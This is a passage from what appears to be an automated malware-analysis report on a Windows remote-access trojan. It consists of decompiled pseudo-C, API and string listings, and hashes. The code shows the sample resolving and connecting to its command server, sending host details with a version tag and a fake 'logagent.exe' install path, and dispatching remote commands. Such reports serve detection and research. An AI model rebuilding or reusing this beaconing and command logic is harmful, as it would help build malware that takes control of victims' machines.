				char _v236;
				char _v260;
				char _v284;
				char _v308;
				char _v332;
				char _v356;
				char _v380;
				char _v404;
				char _v428;
				char _v452;
				char _v476;
				char _v500;
				char _v524;
				char _v548;
				char _v572;
				char _v596;
				char _v620;
				char _v644;
				char _v668;
				char _v692;
				char _v716;
				char _v740;
				char _v764;
				char _v788;
				char _v812;
				char _v836;
				char _v860;
				char _v884;
				char _v908;
				char _v932;
				char _v956;
				char _v980;
				char _v1004;
				char _v1028;
				char _v1052;
				char _v1076;
				char _v1100;
				char _v1124;
				char _v1148;
				char _v1172;
				char _v1196;
				char _v1220;
				char _v1244;
				char _v1268;
				char _v1292;
				char _v1316;
				char _v1340;
				char _v1364;
				char _v1388;
				char _v1412;
				char _v1436;
				char _v2436;
				signed int _t166;
				void* _t168;
				long _t172;
				void* _t174;
				signed char _t178;
				void* _t184;
				short _t195;
				void* _t197;
				void* _t198;
				void* _t200;
				long _t204;
				short _t209;
				void* _t210;
				void* _t212;
				void* _t225;
				void* _t233;
				void* _t234;
				void* _t237;
				intOrPtr* _t238;
				void* _t241;
				void* _t242;
				void* _t243;
				void* _t246;
				void* _t248;
				void* _t250;
				void* _t251;
				void* _t252;
				void* _t253;
				void* _t254;
				void* _t256;
				void* _t257;
				void* _t258;
				intOrPtr* _t353;
				void* _t367;
				void* _t369;
				void* _t371;
				void* _t373;
				void* _t375;
				long _t379;
				void* _t380;
				void* _t381;
				char* _t401;
				void* _t616;
				void* _t625;
				void* _t677;
				signed short _t681;
				struct _SECURITY_ATTRIBUTES* _t684;
				void* _t694;
				void* _t695;
				void* _t696;
				void* _t697;
				void* _t698;
				void* _t699;
				void* _t700;
				void* _t701;
				void* _t703;
				void* _t704;
				void* _t708;
				void* _t709;
				void* _t710;
				void* _t711;
				void* _t712;
				long _t714;

				_push(_t380);
				E004020D5(_t380,  &_v104);
				L00416FDC( &_v236, _t616);
				E004020D5(_t380,  &_v1436);
				_t677 = 0x46c578;
				_t166 = E00436769(_t164, L00401F95(L00401E49(0x46c578, _t616, _t712, 0x29)));
				if(_t166 != 0) {
					_t379 = _t166 * 0x3e8;
					_t714 = _t379;
					Sleep(_t379);
				}
				_t695 = _t694 - 0x18;
				E00402084(_t380, _t695, 0x4657ec);
				_t168 = L00401E49(_t677, _t616, _t714, 0);
				_t696 = _t695 - 0x18;
				E004020EC(_t380, _t696, _t616, _t714, _t168);
				E00417478( &_v32, _t616);
				_t697 = _t696 + 0x30;
				_t684 = 0;
				_v8 = 0;
				_t381 = 0;
				L00401E49(_t677, _t616, _t714, 0x3a);
				_t617 = 0x45f6bc;
				_t172 = E0040EAD9(_t714);
				_t715 = _t172;
				if(_t172 != 0) {
					L00401E49(_t677, 0x45f6bc, _t715, 0x3a);
					_t367 = E00402489();
					_t369 = L00401F95(L00401E49(_t677, 0x45f6bc, _t715, 0x3a));
					L00401E49(_t677, 0x45f6bc, _t715, 0x39);
					_t371 = E00402489();
					_t373 = L00401F95(L00401E49(_t677, _t617, _t715, 0x39));
					L00401E49(_t677, _t617, _t715, 0x38);
					_t375 = E00402489();
					L00401F95(L00401E49(_t677, _t617, _t715, 0x38));
					_t617 = _t375;
					E00404882(_t375, _t373, _t371, _t369, _t367);
					_t697 = _t697 + 0x10;
					_t684 = 0;
				}
				L4:
				_t698 = _t697 - 0x18;
				E00402084(_t381, _t698, 0x4657f0);
				_t174 = L00401E49( &_v32, _t617, _t715, _t381);
				_t699 = _t698 - 0x18;
				E004020EC(_t381, _t699, _t617, _t715, _t174);
				E00417478( &_v20, _t617);
				_t697 = _t699 + 0x30;
				L00401E49( &_v20, _t617, _t715, 2);
				_t618 = "0";
				_t178 = E00405A6F("0");
				asm("sbb al, al");
				 *0x46bae0 =  ~_t178 + 1;
				E0040498B(0x46c780);
				if(_t684 >= 0 || E004021F5( &_v32) > 1) {
					_t718 =  *0x46c781 - 1;
					_t401 =  &_v104;
					if( *0x46c781 != 1) {
						_push(0x45f6bc);
					} else {
						_push(" (TLS)");
					}
					E00405A0B(_t381, _t401);
					_t700 = _t697 - 0x18;
					_t184 = L00401E49( &_v20, _t618, _t718, 1);
					_t617 = L00402F93(_t381,  &_v128, E00405343(_t381,  &_v56, E004075E6( &_v80, "Connecting to ", _t718, L00401E49( &_v20, _t618, _t718, 0)), _t677, _t718, 0x4657f0), _t718, _t184);
					L00402F93(_t381, _t700, _t188, _t718,  &_v104);
					_t701 = _t700 - 0x14;
					E00402084(_t381, _t701, "[Info]");
					L00416C80(_t381, _t677);
					_t697 = _t701 + 0x30;
					E00401FC7();
					E00401FC7();
					E00401FC7();
					_t684 = _v8;
				}
				_t195 = 2;
				 *0x46bacc = _t195;
				_t197 = L00401F95(L00401E49( &_v20, _t617, _t718, 0));
				__imp__#52(_t197); // executed
				_t719 = _t197;
				if(_t197 != 0) {
					E004324E0(0x46bad0,  *((intOrPtr*)( *((intOrPtr*)(_t197 + 0xc)))),  *((short*)(_t197 + 0xa)));
					_t209 = E00436769(_t207, L00401F95(L00401E49( &_v20, _t617, _t719, 1)));
					__imp__#9();
					_t697 = _t697 + 0xc - 0x10;
					 *0x46bace = _t209;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t210 = E00404A08(_t617, _t209); // executed
					_t720 = _t210;
					if(_t210 != 0) {
						_t703 = _t697 - 0x18;
						_t212 = L00401E49( &_v20, _t617, _t720, 1);
						_t625 = L00402F93(_t381,  &_v56, E00405343(_t381,  &_v188, E004075E6( &_v212, "Connected to  ", _t720, L00401E49( &_v20, _t617, _t720, 0)), 0x46c780, _t720, 0x4657f0), _t720, _t212);
						L00402F93(_t381, _t703, _t625, _t720,  &_v104);
						_t704 = _t703 - 0x14;
						E00402084(_t381, _t704, "[Info]");
						L00416C80(_t381, 0x46c780);
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00404E9A(0x46c780, 0xa, 0); // executed
						_v164 = 0;
						asm("stosd");
						_v8 = 1;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd"); // executed
						_t225 = E00416EFA(0x46c780); // executed
						_push(_t625);
						E00411912( &_v164, "%I64u", _t225);
						E00407350(_t381,  &_v128, _t625, _t720, 0x46c3b0);
						E0043BACE( &_v128,  *0x46a9d0,  &_v140, 0xa);
						E004020EC(_t381,  &_v80, _t625, _t720, L00401E49(0x46c578, _t625, _t720, 1));
						_t233 = E00402489();
						_t234 = L00401F95(0x46c560);
						_t237 = E00410A30(L00401F95(0x46c518), "name",  &_v2436, 0x104, _t234, _t233); // executed
						_t708 = _t704 + 0x60;
						if(_t237 != 0) {
							E00405A0B(_t381,  &_v80,  &_v2436);
						}
						_t238 =  *0x46bd44; // 0x0
						_t681 = 0;
						_t722 = _t238;
						if(_t238 != 0) {
							_t681 =  *_t238() & 0x0000ffff;
						}
						E0040427F(_t381,  &_v56, "C:\Windows\SysWOW64\logagent.exe");
						_t709 = _t708 - 0x18;
						_t241 = E0041739C(_t381,  &_v1412, 0x46c500);
						_t242 = E00417226(_t381,  &_v1388, _t681 & 0x0000ffff);
						_t243 = L00401E49( &_v20, _t681 & 0x0000ffff, _t722, 0);
						_t246 = E00417226(_t381,  &_v1364, GetTickCount());
						_t248 = E00417226(_t381,  &_v1340, E004171D6( &_v1364));
						_t250 = E0041719C( &_v1316); // executed
						_t251 = E0041739C(_t381,  &_v1292, _t250);
						_t252 = E0041739C(_t381,  &_v1268, 0x46c0e0);
						_t253 = E0041739C(_t381,  &_v1244,  &_v56);
						_t254 = E0041739C(_t381,  &_v1220,  &_v128);
						_t256 = E0041739C(_t381,  &_v1196, 0x46c880);
						_t257 = E0040D1E5( &_v1172);
						_t258 = E0041739C(_t381,  &_v1148, 0x46c584);
						_t617 = L00402F93(_t381,  &_v212, L00402F93(_t381,  &_v188, L00402F93(_t381,  &_v260, L00402F1D( &_v284, L00402F93(_t381,  &_v308, L00402F1D( &_v332, L00402F93(_t381,  &_v356, L00402F93(_t381,  &_v380, L00402F93(_t381,  &_v404, L00402F93(_t381,  &_v428, L00402F93(_t381,  &_v452, E00405343(_t381,  &_v476, L00402F93(_t381,  &_v500, L00402F1D( &_v524, L00402F93(_t381,  &_v548, L00402F1D( &_v572, L00402F93(_t381,  &_v596, E0040759C(_t381,  &_v620, L00402F93(_t381,  &_v644, L00402F1D( &_v668, L00402F93(_t381,  &_v692, L00402F1D( &_v716, L00402F93(_t381,  &_v740, L00402F1D( &_v764, L00402F93(_t381,  &_v788, L00402F1D( &_v812, L00402F93(_t381,  &_v836, E00405343(_t381,  &_v860, L00402F93(_t381,  &_v884, E00405343(_t381,  &_v908, L00402F93(_t381,  &_v932, L00402F1D( &_v956, L00402F93(_t381,  &_v980, L00402F93(_t381,  &_v1004, L00402F93(_t381,  &_v1028, L00402F1D( &_v1052, L00402F93(_t381,  &_v1076, L00402F1D( &_v1100, L00402FB7( &_v1124,  &_v80, 0x46c238), _t258), _t722, 0x46c238), _t257), _t722, 0x46c238), _t722, 0x46c5b4), _t722, 0x46c238), _t256), _t722, 0x46c238), 0x46c238, _t722,  &_v164), _t722, 0x46c238), 0x46c238, _t722, "3.2.1 Pro"), _t722, 0x46c238), _t254), _t722, 0x46c238), _t253), _t722, 0x46c238), _t252), _t722, 0x46c238), _t251), _t722, 0x46c238), 0x46c238, _t722,  *0x46a9d4 & 0x000000ff), _t722, 0x46c238), _t248), _t722, 0x46c238), _t246), _t722, 0x46c238), 0x46c238, _t722,  &_v140), _t722, 0x46c238), _t722, _t243), _t722, 0x46c238), _t722, "Sept-AITAB5"), _t722, 0x46c238), _t242), _t722, 0x46c238), _t241), _t722, 0x46c238), _t722,  &_v236), _t722, 0x46c238);
						L00402F93(_t381, _t709, _t297, _t722, "Exe");
						_push(0x4b);
						E00404AA4(_t381, 0x46c780, _t297, _t722); // executed
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						L00401EF0();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						L00401EF0();
						E00404BBE(0x46c780, _t297, E004123B9, 1);
						_t353 =  *0x46bd48; // 0x0
						if(_t353 != 0 &&  *0x46bd4d != 0) {
							_t353 =  *_t353();
							 *0x46bd4d = 0;
						}
						if( *0x46c39a != 0) {
							_t353 = E0040951E(_t381, 0x46c350);
						}
						E004059C5(_t353);
						_t710 = _t709 - 0x18;
						E00402084(_t381, _t710, "Disconnected!");
						_t711 = _t710 - 0x18;
						E00402084(_t381, _t711, "[Info]");
						L00416C80(_t381, 0x46c238);
						_t697 = _t711 + 0x30;
						if( *0x46bea4 != 0) {
							CreateThread(0, 0, E0041667F, 0, 0, 0);
						}
						E00401FC7();
						L00401EF0();
					}
					_t684 = _v8;
					_t677 = 0x46c578;
				}
				_t684 = _t684 - 1;
				_v8 = _t684;
				_t381 = _t381 + 1;
				_t198 = E004021F5( &_v32);
				_t728 = _t381 - _t198;
				if(_t381 >= _t198) {
					_t200 = 2;
					_t381 = 0;
					_t204 = E00436769(_t201, L00401F95(L00401E49(_t677, _t617, _t728, _t200))) * 0x3e8;
					_t715 = _t204;
					Sleep(_t204);
				}
				L00401E74( &_v20, _t617);
				goto L4;
			}

0x00411935
0x00411938
0x00411943
0x0041194e
0x00411953
0x00411969
0x00411971
0x00411973
0x00411973
0x0041197a
0x0041197a
0x00411980
0x0041198a
0x00411993
0x00411998
0x0041199e
0x004119a6
0x004119ab
0x004119ae
0x004119b2
0x004119b5
0x004119b9
0x004119be
0x004119c5
0x004119ca
0x004119cc
0x004119d2
0x004119d9
0x004119ea
0x004119f4
0x004119fb
0x00411a0c
0x00411a16
0x00411a1d
0x00411a2f
0x00411a34
0x00411a38
0x00411a3d
0x00411a40
0x00411a40
0x00411a42
0x00411a42
0x00411a4c
0x00411a55
0x00411a5a
0x00411a60
0x00411a68
0x00411a6d
0x00411a75
0x00411a7a
0x00411a81
0x00411a8d
0x00411a91
0x00411a96
0x00411a9d
0x00411ab0
0x00411ab7
0x00411aba
0x00411ac3
0x00411abc
0x00411abc
0x00411abc
0x00411ac8
0x00411acd
0x00411adb
0x00411b15
0x00411b19
0x00411b1e
0x00411b28
0x00411b2d
0x00411b32
0x00411b38
0x00411b40
0x00411b48
0x00411b4d
0x00411b4d
0x00411b52
0x00411b58
0x00411b65
0x00411b6b
0x00411b71
0x00411b73
0x00411b88
0x00411ba2
0x00411ba9
0x00411baf
0x00411bb2
0x00411bbf
0x00411bc0
0x00411bc1
0x00411bc2
0x00411bca
0x00411bcf
0x00411bd1
0x00411bd7
0x00411be5
0x00411c25
0x00411c29
0x00411c2e
0x00411c38
0x00411c3d
0x00411c48
0x00411c53
0x00411c5e
0x00411c69
0x00411c6e
0x00411c7f
0x00411c81
0x00411c84
0x00411c85
0x00411c86
0x00411c87
0x00411c88
0x00411c8d
0x00411c9b
0x00411cab
0x00411cbf
0x00411cd6
0x00411ce2
0x00411cea
0x00411d0d
0x00411d12
0x00411d17
0x00411d23
0x00411d23
0x00411d28
0x00411d2d
0x00411d2f
0x00411d31
0x00411d35
0x00411d35
0x00411d40
0x00411d45
0x00411d68
0x00411d7c
0x00411d93
0x00411db0
0x00411dc4
0x00411dda
0x00411de7
0x00411df9
0x00411e09
0x00411e19
0x00411e39
0x00411e4c
0x00411e5e
0x00412088
0x0041208c
0x00412097
0x0041209b
0x004120a6
0x004120b1
0x004120bc
0x004120c7
0x004120d2
0x004120dd
0x004120e8
0x004120f3
0x004120fe
0x00412109
0x00412114
0x0041211f
0x0041212a
0x00412135
0x00412140
0x0041214b
0x00412156
0x00412161
0x0041216c
0x00412177
0x00412182
0x0041218d
0x00412198
0x004121a3
0x004121ae
0x004121b9
0x004121c4
0x004121cf
0x004121da
0x004121e5
0x004121f0
0x004121fb
0x00412206
0x00412211
0x0041221c
0x00412227
0x00412232
0x0041223d
0x00412248
0x00412253
0x0041225e
0x00412269
0x00412274
0x0041227f
0x0041228a
0x00412295
0x004122a0
0x004122ab
0x004122b6
0x004122c1
0x004122cc
0x004122d4
0x004122e2
0x004122e7
0x004122ee
0x004122f9
0x004122fb
0x004122fb
0x00412309
0x00412310
0x00412310
0x00412315
0x0041231a
0x00412324
0x00412329
0x00412333
0x00412338
0x0041233d
0x00412347
0x00412355
0x00412355
0x0041235e
0x00412366
0x00412366
0x0041236b
0x0041236e
0x0041236e
0x00412373
0x00412377
0x0041237a
0x0041237b
0x00412380
0x00412382
0x00412386
0x0041238a
0x0041239e
0x0041239e
0x004123a6
0x004123a6
0x004123af
0x00000000

APIs

Sleep.KERNEL32(00000000,00000029,74B043E0,0046C578,00000000), ref: 0041197A

Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A

gethostbyname.WS2_32(00000000), ref: 00411B6B
htons.WS2_32(00000000), ref: 00411BA9
Sleep.KERNEL32(00000000,00000002), ref: 004123A6

Part of subcall function 00410A30: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
Part of subcall function 00410A30: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
Part of subcall function 00410A30: RegCloseKey.KERNELBASE(00000000), ref: 00410A70

GetTickCount.KERNEL32 ref: 00411DA2

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

CreateThread.KERNEL32 ref: 00412355

Strings

Connecting to , xrefs: 00411AF1
Disconnected!, xrefs: 0041231F
Sept-AITAB5, xrefs: 00411D8B
3.2.1 Pro, xrefs: 00411E20
Connected to , xrefs: 00411BFB
%I64u, xrefs: 00411C95
C:\Windows\SysWOW64\logagent.exe, xrefs: 00411D38
(TLS), xrefs: 00411ABC
name, xrefs: 00411D01
[Info], xrefs: 00411B23, 00411C33, 0041232E
Exe, xrefs: 00411D5A

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Sleep$CloseCountCreateLocalOpenQueryThreadTickTimeValuegethostbynamehtonssend
String ID: (TLS)$%I64u$3.2.1 Pro$C:\Windows\SysWOW64\logagent.exe$Connected to $Connecting to $Disconnected!$Exe$Sept-AITAB5$[Info]$name
API String ID: 2130001850-1839266921
Opcode ID: 53f1d31ab45dcf2409cf5ff9e38295537c92501bbda82d1399bf5fe1de45c5f3
Instruction ID: c8c226d7e30845bf2bb3d2e67be1d86719b60e177ee7695842f0b4eb2dcf0a18
Opcode Fuzzy Hash: 53f1d31ab45dcf2409cf5ff9e38295537c92501bbda82d1399bf5fe1de45c5f3
Instruction Fuzzy Hash: ED427A31A102155BCB18F762DD56AEEB375AF50308F5001BFB40AB61E2EF785F858E89

Uniqueness

Uniqueness Score: -1.00%

Function 0041805B, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0041805B(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v524;
				char _v544;
				char _v560;
				char _v572;
				void* _v576;
				char _v580;
				char _v584;
				char _v600;
				char _v608;
				char _v616;
				char _v620;
				void* _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v644;
				void* _v648;
				char _v652;
				void* _v672;
				void* __ebx;
				signed int _t36;
				void* _t39;
				void* _t40;
				void* _t77;

				_t73 = __edx;
				_t77 = __ecx;
				_t54 = __edx;
				L00401F6D(__edx,  &_v644);
				_t36 = __edx + 0xffffffd0;
				_t85 = _t36 - 7;
				if(_t36 <= 7) {
					switch( *((intOrPtr*)(_t36 * 4 +  &M00418237))) {
						case 0:
							_push(L"Temp");
							goto L14;
						case 1:
							__ecx =  &_v620;
							__eax = L00416D45(__ebx,  &_v620);
							__ecx =  &_v644;
							__eax = L00401EFA( &_v644, __edx, __esi, __eax);
							goto L4;
						case 2:
							_push(L"SystemDrive");
							goto L14;
						case 3:
							_push(L"WinDir");
							goto L14;
						case 4:
							__eax = E00417614(__ecx);
							__eflags = __al;
							if(__eflags != 0) {
								__ecx =  &_v620;
								E0040427F(__ebx, __ecx, L"\\SysWOW64") = E0043987F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v580;
								__eax = E00403030( &_v580, __edx, __eax);
								__ecx =  &_v652;
								__eax = L00401EFA( &_v652, __edx, __esi, __eax);
								__ecx =  &_v584;
								__eax = L00401EF0();
								__ecx =  &_v608;
								__eax = L00401EF0();
								L4:
								__ecx =  &_v620;
								goto L5;
							} else {
								__ecx =  &_v572;
								E0040427F(__ebx, __ecx, L"\\system32") = E0043987F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v628;
								__eax = E00403030( &_v628, __edx, __eax);
								__ecx =  &_v652;
								__eax = L00401EFA( &_v652, __edx, __esi, __eax);
								__ecx =  &_v632;
								__eax = L00401EF0();
								__ecx =  &_v608;
								__eax = L00401EF0();
								__ecx =  &_v584;
								L5:
								__eax = L00401EF0();
								goto L15;
							}
							L16:
						case 5:
							_push(L"ProgramFiles");
							goto L14;
						case 6:
							_push(L"AppData");
							goto L14;
						case 7:
							_push(L"UserProfile");
							L14:
							L00409DC9(_t54,  &_v644, E0043987F(_t54, _t57, _t85));
							goto L15;
					}
				}
				L15:
				__imp__GetLongPathNameW(L00401EEB( &_v644),  &_v524, 0x208); // executed
				_t39 = E0040427F(_t54,  &_v560, _a4);
				_t40 = E0040427F(_t54,  &_v636, "\\");
				E00403030(_t77, E00403030( &_v600, E004183F4(_t54,  &_v616, _t73, _t85,  &_v544, _t38), _t40), _t39);
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				return _t77;
				goto L16;
			}

0x0041805b
0x0041806a
0x0041806c
0x00418072
0x0041807a
0x0041807d
0x00418080
0x00418086
0x00000000
0x0041808d
0x00000000
0x00000000
0x00418097
0x0041809b
0x004180a1
0x004180a5
0x00000000
0x00000000
0x004180b8
0x00000000
0x00000000
0x004180c2
0x00000000
0x00000000
0x004180cc
0x004180d1
0x004180d3
0x0041812c
0x0041813b
0x00418142
0x0041814b
0x0041814d
0x00418151
0x00418158
0x0041815c
0x00418161
0x00418165
0x0041816a
0x0041816e
0x004180aa
0x004180aa
0x00000000
0x004180d5
0x004180da
0x004180e9
0x004180f0
0x004180f9
0x004180fb
0x004180ff
0x00418106
0x0041810a
0x0041810f
0x00418113
0x00418118
0x0041811c
0x00418121
0x004180ae
0x004180ae
0x00000000
0x004180ae
0x00000000
0x00000000
0x00418178
0x00000000
0x00000000
0x0041817f
0x00000000
0x00000000
0x00418186
0x0041818b
0x00418196
0x00000000
0x00000000
0x00418086
0x0041819b
0x004181b2
0x004181c1
0x004181d0
0x004181f8
0x00418202
0x0041820b
0x00418214
0x0041821d
0x00418226
0x00418233
0x00000000

APIs

GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 004181B2

Strings

ProgramFiles, xrefs: 00418178
AppData, xrefs: 0041817F
\system32, xrefs: 004180D5
SystemDrive, xrefs: 004180B8
Temp, xrefs: 0041808D
WinDir, xrefs: 004180C2, 004180E4, 00418136
UserProfile, xrefs: 00418186
\SysWOW64, xrefs: 00418127

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: LongNamePath
String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-1609423294
Opcode ID: 39dde32078a1c0c9734e1eac18322eab1b816c4a9a6af5cbdea1dbf03ad64e2c
Instruction ID: e17f698a51b082165e1e9e1ea6160020ed1fd31ab47ab9f863ee2cf3c228b6bb
Opcode Fuzzy Hash: 39dde32078a1c0c9734e1eac18322eab1b816c4a9a6af5cbdea1dbf03ad64e2c
Instruction Fuzzy Hash: EE4189721182409AC204FB21DC52DEF77A9BFA4748F50053FF846620F2EE785E4AC65B

Uniqueness

Uniqueness Score: -1.00%

Function 004123B9, Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 458
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004123B9(void* __ebx, CHAR* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a36, intOrPtr _a37, intOrPtr _a41, intOrPtr _a47, char _a61) {
				char _v116;
				char _v120;
				char _v140;
				char _v156;
				char _v164;
				void* _v172;
				char _v192;
				void* _v196;
				char _v212;
				char _v216;
				void* _v220;
				char _v240;
				void* _v244;
				char _v252;
				char _v264;
				void* _v268;
				void* _v284;
				char _v288;
				void* _v292;
				char _v304;
				char _v308;
				char _v312;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				char _v364;
				char _v368;
				long _v372;
				int _v376;
				char _v396;
				char _v400;
				void* _v404;
				int _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				char _v440;
				char _v444;
				char _v452;
				char _v500;
				char _v504;
				void* __esi;
				void* _t244;
				void* _t246;
				intOrPtr _t374;
				intOrPtr _t375;
				void* _t376;
				void* _t378;
				signed int _t379;
				signed int _t385;
				void* _t388;
				void* _t389;
				void* _t390;
				void* _t394;
				void* _t400;

				_t399 = __eflags;
				_t360 = __edx;
				_t294 = __ebx;
				_push(__ebx);
				_t374 = _a4;
				E004020EC(__ebx,  &_v308, __edx, __eflags, _t374 + 0x1c);
				SetEvent( *(_t374 + 0x34));
				_t375 =  *((intOrPtr*)(L00401F95( &_v312)));
				E004042A6( &_v312,  &_v288, 4, 0xffffffff);
				_t388 = (_t385 & 0xfffffff8) - 0x18c;
				E004020EC(__ebx, _t388, _t360, _t399, 0x46c238);
				_t389 = _t388 - 0x18;
				E004020EC(__ebx, _t389, _t360, _t399,  &_v304);
				E00417478( &_v444, _t360);
				_t390 = _t389 + 0x30;
				_t400 = _t375 - 0x8f;
				if(_t400 > 0) {
					_t376 = _t375 + 0xffffff70;
					__eflags = _t376 - 0x22;
					if(__eflags <= 0) {
						switch( *((intOrPtr*)(( *(_t376 + 0x413511) & 0x000000ff) * 4 +  &M004134C5))) {
							case 0:
								__ecx =  &_v420;
								__ecx = L00401E49( &_v420, __edx, __eflags, 0);
								__eax = L00401F95(__ecx);
								__ecx = __eax;
								__eax = L00407F83(__ecx);
								goto L125;
							case 1:
								__ecx =  &_v420;
								__ecx = L00401E49( &_v420, __edx, __eflags, 0);
								__eax = L00401F95(__eax);
								__eax = StrToIntA(__eax);
								__ecx =  &_v424;
								__edi = __eax;
								__ecx = L00401E49( &_v424, __edx, __eflags, 1);
								__eax = L00401F95(__eax);
								__dl = 0x30;
								__ecx =  &_v408;
								__eax = E0041805B( &_v408, __edx, __eax);
								__ecx =  &_v408;
								__eax = L00401EEB( &_v408);
								__ecx =  &_v428;
								__esi = __eax;
								__eax = L00401E49( &_v428, __edx, __eflags, 2);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
								__ecx = __esi;
								__eax = E00417A4E(__esi);
								__esp = __esp + 0x18;
								__ecx =  &_v416;
								__edx = L00401EEB( &_v416);
								__ecx = __edi;
								__eax = L00417F10(__edi, __edx);
								goto L105;
							case 2:
								__ecx =  &_v420;
								__ecx = L00401E49( &_v420, __edx, __eflags, 1);
								__eax = L00401F95(__eax);
								__ecx =  &_v424;
								__ecx = L00401E49( &_v424, __edx, __eflags, 0);
								__eax = L00401F95(__ecx);
								__eax = SetWindowTextW(__eax, __eax);
								goto L20;
							case 3:
								__ecx =  &_v420;
								__eax = L00401E49( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00413545(__ebx, __edx);
								goto L102;
							case 4:
								__ecx =  &_v420;
								__eax = L00401E49( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00413673(__ecx, __eflags);
								goto L102;
							case 5:
								E004020EC(__ebx, _t390 - 0x18, _t360, __eflags, L00401E49( &_v420, _t360, __eflags, 0));
								E0040691F(_t360);
								goto L102;
							case 6:
								__ecx =  &_v420;
								__eax = L00401E49( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00415397(__edx);
								goto L102;
							case 7:
								__ecx =  &_v420;
								__eax = L00401E49( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00404013(__edx);
								goto L102;
							case 8:
								__eax = E0041667F(__ebx);
								goto L125;
							case 9:
								__eax = E004167AD(__ebx, __eflags);
								goto L125;
							case 0xa:
								__eax = E004167EA(__eax);
								goto L125;
							case 0xb:
								__ebx = 0;
								__ecx =  &_v420;
								__ecx = L00401E49( &_v420, __edx, __eflags, 0);
								__eax = E00405220(0);
								__ecx =  &_v428;
								__eflags =  *__eax - __bl;
								__ebx = 0 | __eflags != 0x00000000;
								__eax = L00401E49( &_v428, __edx, __eflags, 1);
								__dl = __bl;
								__ecx = __eax;
								__eax = E0041678C(__ecx, __edx, __edi, __esi);
								goto L125;
							case 0xc:
								__eax = E004167F2(__edx);
								goto L125;
							case 0xd:
								__eax = L00405F77(__ebx, __ecx, __edx);
								__ecx =  &_v420;
								__esi = __eax;
								__eax = L00401E49( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx =  &_v340;
								__edi = __esp;
								__edx = __esi;
								__edx = E00417226(__ebx,  &_v340, __esi);
								__ecx =  &_v372;
								__edx = __eax;
								__ecx = __edi;
								__eax = L00402F93(__ebx, __edi, __edx, __eflags, __eax);
								_push(0xab);
								goto L124;
							case 0xe:
								__eflags =  *0x46bb03;
								if( *0x46bb03 != 0) {
									ShowWindow( *0x46bebc, 9) = SetForegroundWindow( *0x46bebc);
								} else {
									__cl = 1;
									__eax = L00418F59(__ebx, __ecx, __edx);
									__ebx = 0;
									__eax = CreateThread(0, 0,  &M00418D28, 0, 0, 0);
									 *0x46bb03 = 2;
								}
								goto L125;
							case 0xf:
								_push(5);
								goto L16;
							case 0x10:
								__ebx = 0;
								_push(0);
								_push(0);
								goto L17;
							case 0x11:
								__ecx =  &_v116;
								__eax = E004072F6( &_v116);
								__ecx =  &_v420;
								__eax = L00401E49( &_v420, __edx, __eflags, 2);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
								__ecx =  &_v428;
								__eax = L00401E49( &_v428, __edx, __eflags, 1);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
								__ecx =  &_v436;
								__eax = L00401E49( &_v436, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
								__ecx =  &_v140;
								__eax = E00405BD3( &_v140, __edx);
